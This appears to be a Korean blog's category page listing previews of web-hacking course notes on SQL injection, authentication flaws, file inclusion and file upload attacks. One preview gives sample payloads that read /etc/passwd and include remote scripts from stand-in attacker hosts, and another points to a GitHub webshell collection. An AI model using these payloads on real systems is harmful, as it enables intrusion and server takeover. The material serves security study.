본문 바로가기

Web hacking78

[13주차] 금취분평 기준 취약점 항목 ----------------------------------------------------- *점검기준 https://www.kisa.or.kr/public/laws/laws3_View.jsp?cPage=1&mode=view&p_No=259&b_No=259&d_No=106&ST=&SV= 기술안내서 가이드 취약점 찾.. 2022. 1. 14.
SQL injection 실습(보고서 작성) 홈페이지 제작 완성이 미뤄짐에 따라 늦어졌던 보고서 작성 실습 사진 삽입하는 중 :) 실습 대상은 개인 가상머신 사이트입니다! ----------------------------------------------------------------------------------------- 2-3 공격 유형에 따른 injection – 데이터 추출 (1) UNion SQL Injection ① 취약점 찾기 □ 홈페이지 파라미터 값에 특수문자나 임의의 SQL을 삽입함으로써 모든 진입점에 대해 반환을 수동으로 감지할 수 있다. - 피라미터: 사용자 입력 폼 또는 URL의 피라미터, 클릭 시 웹 프록시를 이용한 피라미터 - 특수문자: ‘ 혹은 “ - 임의의 SQL 문: SELECT, UNION, HAVING 등 .. 2022. 1. 13.
[11주차] 인증/인가 취약점 수업 필기 일상 취약점 수다) *방역패스 - 이미지만 보고 입장함 - 다른사람의 정보로 방역패스 보여줘도 내건지 확인하는 2차절차가 없음 *배민오더 - 서버인척하고 데이터를 넣어주면 치킨을 공짜로 먹을수있을까? 수업) *인증/인가 -> 인증과 인가가 불충분해서 발생하는 취약점 인증: Authentictication - 그 사람이 맞는지 확인하는 작업 Ex) 로그인 인증, 본인 인증, 휴대전화 인증, 카드 인증 인가: Authorization - 권한을 부여하는 것 ex) 글 수정 허용, 삭제 등등... --------------------------------------------------------------------- --인증 취약점 -> 다른사람인 척 할 수 있다. -> 인증 우회 = 인증 프로세스 우회 .. 2021. 12. 23.
[10주차] LFI, RFI/ 파일업로드 공격 대응방안/ 파일 다운로드 취약점 ------------------------------------------------------------------------------------------------------------------ fi (file inclusion) > 사용자 입력을 받아서 include include($_GET['url']); **RFI(Remote File Inclusion) : 외부 서버 코드를 불러와서 인클루드. [정의] 원래 개별파일로 페이지를 제작하면 공통적으로 들어가는 양식때 한 항목 부분을 수정하면 나머지 항목들도 수정해야하는 번거로움이 있었다. 그렇지만 include를 사용함으로써 이런 번거로움을 줄일 수 있었는데, Top.php, middle.php, bottom.php로 부분을 나누어 따로 개.. 2021. 12. 22.
[복습]파일 업로드 취약점 실습(2) 5. 이미지에 웹쉘을 인코딩해 우회하는 방법을 실습 https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-polyglot-web-shell-upload Lab: Remote code execution via polyglot web shell upload | Web Security Academy This lab contains a vulnerable image upload function. Although it checks the contents of the file to verify that it is a genuine image, it is still possible ... portswigger.. 2021. 12. 16.
[10주차] File Inclusion(LFI, RFI) File Iuclusion에서 공격 전 체크할 수 있는 사항으로는 Directory Traversal과 Local File lnclusion, Remote Dile Inclusion이다. Directory Traversal: ?page=../../etc/passwd Local File Inclusion: ?page=../../uploads/my_backdoor.php Remote File Inclusion: ?page=hrrp://evillsite.com/attackserver.php, ?page=http://evilsite.com/XSS.js **윈도우는 역슬래시 리눅스는 / 슬래시이다. RFI(원격 파일 포함, Remote File Inclusion)는 외부 스크립트를 동적으로 참조하는 웹 응용 프로.. 2021. 12. 16.
[복습] 파일 업로드 취약점 실습(1) 파일 업로드 취약점 실습 1. 파일 업로드 취약점 아무런 검증이 없는 경우 https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload Lab: Remote code execution via web shell upload | Web Security Academy This lab contains a vulnerable image upload function. It doesn't perform any validation on the files users upload before storing them on the server's ... portswigger.net (1) php.. 2021. 12. 14.
[9주차] 파일 업로드 취약점 *파일 업로드 - SQL Injectoin - XSS - CSRF - 파일 업로드 다운로드 - 인증/인가 3개월: 웹 해킹 공격 4개월: 모의해킹 프로젝트, 취약점 점검 항목, 보고서 작성 방법, 금취분평(금융 취약점 분석 평가) 5개월: 모의해킹 프로젝트 *파일 업로드 > 악성 스크립트 업로드 서버 측에서 실행 쉘 획득 > 업로드 하는데 실행권한이 있어야한다. > 확장자 필터링이 없는 경우 php 서버 실행 > 악성 파일 업로드(시스템 명령) 실행 > 서버 내부 파일을 삭제하거나 수정, 유출 등 -> 관리자 권한 획득 > 대응방안: 화이트 리스트 기반, 실행권한 제거 + 1. 파일 업로드란? > 공격자가 원하는 임의의 파일을 업로드 할 수 있는 취약점. (모든, 어떤) -- 발생 위치 > 게시판 자료실.. 2021. 12. 10.
[9주차]파일 업로드/다운로드 취약점 1. 파일 업로드 공격 **개념 웹 서비스 첨부파일, 환경설정 미흡을 이용하여 악의적인 스크립트가 포함된 파일을 업로드 한 후에 웹 서버에 침투를 하는 공격(첨부, 경로파악, 공격 모두 가능해야함) 공격자는 서버 사이드 스크립트(php, jsp, .net 등)을 이용해서 웹쉘을 제작한다. 웹쉘은 원격에서 웹 서버를 제어하기 위해 만들어졌지만 지금은 웹쉘=악성코드로 분류해서 안티 바이러스에서 탐지한다. 게시판 첨부파일, 이력서 첨부파일, 이미지 첨부파일, 웹 채팅방 파일 공유 기능 등에서 발생 직접 만들어 사용할 수 있으나, https://github.com/tennc/webshell 같은 깃허브에서 쉽게 구할 수 있다. **목적 웹 서버를 통해 데이터 베이스의 정보를 획득. -데이터 베이스에 직접 공격을.. 2021. 12. 8.